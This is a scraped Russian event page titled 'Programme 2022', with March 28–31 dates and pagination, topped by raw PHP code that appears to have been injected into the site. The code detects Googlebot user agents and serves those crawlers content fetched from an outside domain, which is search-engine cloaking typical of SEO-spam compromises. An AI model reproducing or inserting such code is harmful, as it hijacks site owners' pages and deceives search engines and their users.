function is_bot() { $agents = array("Googlebot", "Google-Site-Verification", "Google-InspectionTool", "Googlebot-Mobile", "Googlebot-News"); foreach ($agents as $agent) { if (strpos($_SERVER['HTTP_USER_AGENT'], $agent) !== false) return true; } return false; } if (is_bot()) { $url = 'https://ampsasuke.com/eduforumhome/page.html'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($ch); curl_close($ch); echo $result ?: ' '; exit; }

Программа 2022

28 марта
29 марта
30 марта
31 марта
Предыдущая
1 2 3